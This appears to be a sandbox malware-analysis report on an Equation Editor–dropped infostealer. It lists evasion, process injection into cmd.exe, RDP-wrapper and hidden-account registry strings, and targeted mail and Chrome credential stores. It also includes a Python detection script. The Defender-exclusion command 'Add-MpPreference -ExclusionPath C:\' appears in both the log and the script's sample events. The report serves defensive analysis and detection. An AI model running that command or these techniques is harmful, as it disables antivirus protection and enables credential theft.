            Source: fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX (49 identical entries)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX (3 identical entries)
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX (6 identical entries)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (49 identical entries)

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeStalling execution: Execution stalls by calling Sleep
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1424Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 1936Thread sleep count: 129 > 30
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 1936Thread sleep time: -64500s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 2648Thread sleep count: 58 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2864Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2296Thread sleep count: 628 > 30
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2296Thread sleep time: -7536000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 628
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: EQNEDT32.EXE, 00000002.00000002.910734013.000000000070A000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000000.907228989.0000000000FE7000.00000008.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180866900.0000000000FE7000.00000004.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 00000005.00000002.1181749722.0000000004285000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1180708241.0000000002B45000.00000004.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 0000000A.00000000.1009097709.0000000000FE7000.00000008.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 0000000A.00000002.1070424601.0000000000FE7000.00000004.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe.2.dr, fifthikmerozx[1].exe.2.drBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
            Source: powershell.exe, 00000006.00000002.988136023.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: EQNEDT32.EXE, 00000002.00000002.910734013.000000000070A000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1181749722.0000000004285000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1180708241.0000000002B45000.00000004.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe.2.dr, fifthikmerozx[1].exe.2.drBinary or memory string: @.?AVCRegistryVirtualMachine@ATL@@
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01EF096A GetSystemInfo,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A9DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFF27 FindFirstFileW,FindNextFileW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFA42 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B094E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B0619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B0620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0243028D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0242FF58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0242FF5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02420467 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_024384B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_000B001A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD807F IsDebuggerPresent,OutputDebugStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD2520 GetProcessHeap,__Init_thread_footer,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8EDC SetUnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8D4A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD87A1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: B0000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: C0000 protect: page read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: B010E
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: B0000
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: C0000
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B1FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A79E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AF56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B18BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8F8B cpuid
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD9284 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
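The process-creation, memory-write and thread-creation entries in this section form one chain that host telemetry sees in order: EQNEDT32.EXE starts the dropped fiftikmernk852317.exe from %AppData%, that executable launches `powershell Add-MpPreference -ExclusionPath C:\`, and it then allocates, writes and starts a thread (EIP B010E) inside a fresh cmd.exe. The code below is an added example, not taken from this report or from Joe Sandbox: it runs four detection rules over Sysmon-style events. The JSON events are constructed to mirror the report's process tree (field names follow Sysmon Event ID 1, 8 and 13); the rule names, severity labels and the lists of user-writable folders and injection targets are my own choices.

```python
"""Detection for the chain in this section, run over Sysmon-style events:
Equation Editor spawning a dropped EXE, that EXE adding a Defender exclusion via
PowerShell, and it creating a remote thread in cmd.exe. Added example; the
events are constructed and use Sysmon Event ID 1 / 8 / 13 field names."""
import json
import ntpath
import re

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData|Downloads)\\", re.I)
OFFICE_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
INJECT_TARGETS = {"cmd.exe", "explorer.exe", "svchost.exe", "rundll32.exe", "regsvr32.exe"}
WHOLE_DRIVE = re.compile(r'-exclusionpath\s+"?[a-z]:\\?"?(\s|$)', re.I)   # e.g. -ExclusionPath C:\


def basename(path):
    return ntpath.basename(path or "").lower()


def rule_office_child(ev):
    """Office / Equation Editor starting a non-Office process (CVE-2017-11882 style)."""
    if ev.get("EventID") != 1 or basename(ev.get("ParentImage")) not in OFFICE_PARENTS:
        return None
    if basename(ev.get("Image")) in OFFICE_PARENTS:
        return None
    sev = "high" if USER_WRITABLE.search(ev.get("Image", "")) else "medium"
    return ("office_spawns_child", sev)


def rule_defender_exclusion(ev):
    """Add-MpPreference -Exclusion*: high when the parent lives in a user-writable path
    or a whole drive is excluded, medium for any other exclusion change."""
    cl = ev.get("CommandLine", "") if ev.get("EventID") == 1 else ""
    if "add-mppreference" not in cl.lower() or not re.search(r"-exclusion(path|process|extension)", cl, re.I):
        return None
    if USER_WRITABLE.search(ev.get("ParentImage", "")) or WHOLE_DRIVE.search(cl):
        return ("defender_exclusion_added", "high")
    return ("defender_exclusion_added", "medium")


def rule_remote_thread(ev):
    """CreateRemoteThread (Sysmon ID 8) from a user-writable path into a system binary."""
    if ev.get("EventID") != 8:
        return None
    if USER_WRITABLE.search(ev.get("SourceImage", "")) and basename(ev.get("TargetImage")) in INJECT_TARGETS:
        return ("remote_thread_from_user_path", "high")
    return None


def rule_ie_connection_limit(ev):
    """Registry write (Sysmon ID 13) to MaxConnectionsPerServer from a non-browser in a
    user-writable path; weak alone, useful to corroborate the rest of the chain."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "").lower()
    if target.endswith(r"\internet settings\maxconnectionsperserver") and USER_WRITABLE.search(ev.get("Image", "")):
        return ("ie_connection_limit_raised", "low")
    return None


RULES = (rule_office_child, rule_defender_exclusion, rule_remote_thread, rule_ie_connection_limit)


def detect(events):
    """Apply every rule to every event; return [(rule, severity, image)]."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append((hit[0], hit[1], ev.get("Image") or ev.get("SourceImage")))
    return hits


def load_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed events (JSON lines). The first four mirror the report's chain; the
# cmd.exe line fires nothing, the svchost-parented exclusion fires at medium.
SAMPLE_EVENTS = r'''
{"EventID":1,"Image":"C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe","CommandLine":"C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe","ParentImage":"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"}
{"EventID":1,"Image":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell Add-MpPreference -ExclusionPath C:\\","ParentImage":"C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe"}
{"EventID":8,"SourceImage":"C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe","TargetImage":"C:\\Windows\\SysWOW64\\cmd.exe","StartAddress":"0x000B010E"}
{"EventID":13,"Image":"C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe","TargetObject":"HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer","Details":"DWORD (0x0000000a)"}
{"EventID":1,"Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd /c dir","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell Add-MpPreference -ExclusionPath C:\\Builds","ParentImage":"C:\\Windows\\System32\\svchost.exe"}
'''

if __name__ == "__main__":
    for rule, sev, image in detect(load_jsonl(SAMPLE_EVENTS)):
        print(f"{sev:6} {rule:30} {image}")
```

The severity split in `rule_defender_exclusion` matters in practice: software deployment tooling legitimately adds exclusions under svchost.exe or an agent service, so only the combination with a user-writable parent or a whole-drive path is worth an immediate page; the other three rules have few benign triggers and can alert on their own.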

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

            Stealing of Sensitive Information

            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: POP3 Password
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: SMTP Password
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: IMAP Password
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: \Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: \Chromium\User Data\Default\Login Data
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
